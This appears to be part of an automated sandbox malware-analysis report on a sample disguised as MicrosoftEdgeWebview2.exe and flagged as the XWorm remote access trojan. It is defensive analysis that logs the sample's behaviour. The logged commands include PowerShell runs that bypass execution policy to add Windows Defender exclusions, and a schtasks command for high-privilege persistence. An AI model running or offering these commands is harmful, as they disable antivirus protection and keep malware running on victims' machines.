            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477
            Source: MicrosoftEdgeWebview2.exe, 00000000.00000002.2956120617.000000001BAF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgx2
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: MicrosoftEdgeWebview2.exe, 00000000.00000002.2956120617.000000001BBBF000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeWebview2.exe, 00000000.00000002.2916217661.0000000000F34000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeWebview2.exe, 00000000.00000002.2956120617.000000001BB96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: MicrosoftEdgeWebview2.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: MicrosoftEdgeWebview2.exe PID: 7632, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: MicrosoftEdgeWebview2.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
